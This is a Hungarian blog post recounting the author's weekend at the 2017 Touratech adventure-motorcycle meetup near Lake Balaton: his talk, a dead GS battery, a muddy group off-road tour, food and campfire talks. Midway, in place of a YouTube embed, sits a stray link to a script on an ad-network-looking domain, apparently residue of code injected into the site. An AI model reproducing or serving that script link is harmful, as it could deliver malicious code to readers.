Hellyel-közzel a kemény mag: Touratech Travel Event 2017

0

Idén is megrendezésre került a Full Gas főhadiszállásán Balatonbogláron a túra és kalandmotorosok Touratech találkozója. (2017.07.28-30.)

Évek óta nagy örömömre eljutok ide, hiszen a Touratech Budapest miatt kapcsolódik is a munkánk ehhez a rendezvényhez. Idén viszont a tavalyihoz hasonlóan “sztár vendég” voltam a Hellas Rally 2016 élménybeszámolója miatt. Biztosan emlékeztek, már írtam róla itt az oldalon.

fejtágító

fejtágító

A nulladik nap péntek volt így megkaptam a közönség bemelegítését. Aki el tudott jönni nem bánta meg szerintem a péntek estét. Itt megkezdődött a nagy melegre való tekintettel a “folyadékok pótlása”. Este nyolcra hirdetett Hellas beszámolóm szerencsére picit csúszott, hiszen a forgalom miatt és egy kis technikai probléma miatt csak 20:15-re értem le.

Touratech Camping

Touratech Camping

Ezek előtt fontos leszögezni, hogy a Kékholdban sikerült segítséget kérnem a terep kerékszett összerakásában, hogy végre a terepre való gumi oda való felnin feszüljön. Köszönöm Ferinek a segítséget, mert ha Ő nincs és a Kékholdos kollégák akkor bajban lettem volna. Munka után fáradtan az előadás azzal a járulékos előnnyel is jár, hogy étlen-szomjan rohantam le, cserébe viszont a vacsorát elbuktam, mert előadást tartottam. Élni tudni kell, bár a fogyókúra aktuális is, Ja nem!

Optimus ismét megfordult Somogyban

Optimus ismét megfordult Somogyban

Fontos tanulság ha részben vizes GS-ed van és indulnál valahova időre akkor előtte dugd töltőre a motorodat. Miért is? Mit rontottam el? Szezonban nem szoktam tölteni a motor akkumulátorát hiszen szinte kizárt, hogy ne üljek rá hetekig. Minden motorom bírta így! Igen ám csak most július 2-án leraktam és most a hónap végén 28-án akartam használni! Nem úgy volt, hogy 3 hónapot kibír télen töltés nélkül? Szerintem de. Mindenesetre az utolsó pillanatban nagyot “tanultam” a BMW töltéséről. Ugyanis véletlen sem indult be a motor még csak mozgatni sem tudta az önindító. Miért? Mit tudom én, csak úgy. Jókor? Nem! Mi okozta? Utólag azt gondolom a gyári GPS ami kikapcsoltnak tűnik de nem az. Talán az a ludas. Ez csak azért furcsa és szomorú, mert gyári az egész motor és gyári a GPS is. Akkor ha leveszem a gyújtást nem kéne lekapcsolnia az egész rendszert? Szemre olyan de valóságban nem biztos….kész öröm, hogy gyárilag van rajta bika kiállás….

az elmaradhatatlan sajtos, tejfölös, foghagymás lángos

az elmaradhatatlan sajtos, tejfölös, fokhagymás lángos

A bő hétvégés esemény fő attrakciója a szombati túra. Természetesen a sok évnyi tapasztalat alapján egyre kisebb csoportokban, egyre inkább az igényeknek megfelelő kihívásokkal lehet egy jót gurulni. A Touratech minden országban ahol jelen van megtartja az éves “rendes” találkozóját ami nem az amerikai márkától megszokott találkozó. Sokkal inkább vérbeli túrázók, csavargók, hobby endurósok fellegvára. A túrán kívül minden percet fel lehet használni a szabad eszmecserére persze kötetlen hangulatban.

móka és kacagás

móka és kacagás

Minél több a túrázó annál értékesebb az információ halmaz, így volt ez idén is. A német Touratech minden évben küldötteket indít útra, így idén is a sör hidalta át a nyelvi és kulturális különbségeket. Mondjuk a technikai beszélgetés előnyös de hajnali 3-kor már indokolatlanul vagány, a 9-kor induló túra miatt. Nem voltam fáradt de reggel inkább csak becsületből vonszoltam ki a földi maradványaimat a sátorból, cserébe úgy is néztem ki mint aki ki van fordítva…Idén először vittem sátrat, hogy a legendásan, a motor mellett eldőltem ruhában ódát elvágjam, azért nem lettem puhány, aláfekvőt most sem hoztam, mert nagynak tűnt.

még a paksi reaktort is kell hűteni

még a paksi reaktort is kell hűteni

A szombati túra viszonylag korán kezdődött, reggel kilenckor, hogy be is lehessen fejezni még délután. Terepen nem ugyanaz a sebesség és időszükséglet mint aszfalton. Többen gurulva, vegyes tudásszinttel kétszáz kilométer is hosszú időben. Megállásokkal, frissítésekkel főleg. A sok csoport közül végül egy közepes terep képességekkel és ismeretekkel rendelkező csoport egyik záró motorosa lettem. Jó, hogy évről-évre egyre több ismerős arcot, barátot üdvözölhetünk itt.

villám készülődés

villám készülődés

A túra szándékosan idő eltolódással indult, hogy ne egymás arcába poroljunk és más vonalon más irányból, a frissítő pontokra közösen tudjunk megérkezni. Túra szempontból az idei év volt a legjobb, ugyanis esett nem kevés csapadék így a rengeteg száraz szakasz ami tavaly nagyon poros volt idén kellemes, helyenként pocsolyás, dagonyás tereppé alakult.

mindenki kipróbálhatta magát

mindenki kipróbálhatta magát

Az erdő mélyén nem tud egy nap alatt kiszáradni a talaj de ez pont jó volt így. Külön kérés volt a tudás és a motor gumi helyes megítélése, részben már sikerült mindenkinek. Itt senki nem Dakar bajnok de a nagy testű endurok egy külön műfaj terepen. Olyannyira, hogy teljesen más tudást igényel mint az amúgy sokkal inkább ide való, kisebb motorok.

jól elvoltunk a sárban is

jól elvoltunk a sárban is

A fokhagymás, tejfölös, sajtos lángos idén sem maradhatott el a hozzá való folyadékokkal, dinnyével és a Balaton parton kézen fekvő Balaton csokival. A mi csoportunkban még a rutinosak is eldőltek néha-néha.

https://adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&www.youtube.com/watch?v=We1UzCw5DZc

Játéktér volt bőven a verseny pályának köszönhetően ahol kicsit mindenki megmutathatta ki Somogy királya….Ja, nem! A hatalmas motorok kulturáltak ha ésszel terelgetjük őket, de azonnal pofán rúgnak ha nagyon ráncigáljuk a fülüket.

mindenki úgy száll le ahogy akar, szó szerint száll...

mindenki úgy száll le ahogy akar, szó szerint száll…

Ott kijön a 125 lóerő és a 260 kg. Bár én is szépen sarkantyúztam mikor egyszer-egyszer lemaradtunk a csoporttól és volt pár nyomvályús vízátfolyásos szakasz ahol a levegőben elforduló motor hátsó kereke próbálta megelőzni az első kerekét, szerencsére nem sikerült neki. Bokszer motorig érő iszapbirkózást is teszteltem bár nem vagyok egy szumó bajnok. Porosan, koszosan, sárosan értünk vissza a főhadiszállásunkra az építkezés alatt álló Full Gas “campingbe”.

Optimus is megkente a csapágyakat olvasztott malac zsírral

Optimus is megkente a csapágyakat olvasztott malac zsírral

Magunkhoz kellett venni egy két hideg sört és a maradék lángost marcangoltuk mint a megvadult tengerészek a sziréneket. Mivel gyönyörű napsütéses idő volt, kézenfekvőnek tűnt elsétálni a Balaton partjáig és ott lemosni az út porát. Sajnos a közelebbi pontot választottuk ahol rajtunk kívül összesen négy ember tartózkodott, nem volt tömeg, cserébe inkább nyugodt volt.

Kékkút

Kékkút

Az estére történetek mesélésével készültünk fel, hiszen közös szalonna, kolbász, hagyma, paprika sütögetés volt a cél. Szombat este főműsoridőben voltak a legjobb előadások: Marokkó, Madagaszkár. Így a sörben állás után már csak hátra kellett dőlni és a kipattogtatott kukoricát izzadt marokkal tartani, Dolby Surround, 3D és társai. Mindkét beszámoló érdekes volt, főleg úgy, hogy Marokkóba én is kaptam meghívást de a munka és az egyéb nyűgök eltántorítottak. Volt mit bánni. Este eszmecsere, bambizás.

még jobban rejtőzködik Optimus

még jobban rejtőzködik Optimus

Másnap elvileg, vasárnap szabad program volt, ébredés után táborbontás és diszkrét angolos távozás el a jobb egyre. Én a sok régi és új ismerős miatt ebéd utánig a reggel megkezdett mondatban maradtam. Így útba esett hármunknak a Theodora kékkúti forrása, hogy most először a nyeregben ne erjedt folyadékot fogyasszunk.

IMG_6470

Úgy voltunk vele, ha már elment a vasárnap, akkor ne kelljen autópályán haza jönni inkább a Balaton felvidéken csavarogva csináljunk egy szép vasárnapot. Volt ideje leülepedni a sok élménynek. Autentikusan néztünk ki csupa sáros motorokkal és sáros ruhával, mint aki világcsavargó. Jövőre is elmegyek! Aki nem volt itt, az nem volt itt!

Méltó befejezése volt a Júliusnak ez a 2,3 napos esemény. A fantasztikus fotókat köszönjük Lórántnak 🙂

Megosztás.

A szerzőről

Nyári Krisztián

Röviden rólam, aki még nem ismerne, szenvedélyem minden, aminek két- három kereke van. Több, mint 35 éve kerékpározom és 25 éve motorozom. Nagyon szeretem a felfedezést, túrázást, csavargást, világjárást. A hosszú évek alatt eljutottam az egyhengeres gépektől a boxerekig, de volt közte soros négy hengeres is és amióta szerző vagyok a MOTOzin motoros magazinnál, azóta még több motort sikerült kipróbálnom. Az évek alatt több felületen is publikáltam, amiből a legismertebb talán a MOTOzin és a BMW R 1150 GS motorom kapcsán vezetett blogom. Az évek alatt eljutottam nagyon sok szép helyre motorral volt, ahová többször is: Horvátország, Görögország, Lengyelország, Szlovákia, Szlovénia, Ausztria, Németország, Svájc, Olaszország, Oroszország, Ukrajna, Kazahsztán, Bulgária, Erdély...Tervben van: Gibraltár, Mongólia, Nordkapp, India... Találkozunk az úton! Főleg ha Te is járod a Tiéd.

Szólj hozzá!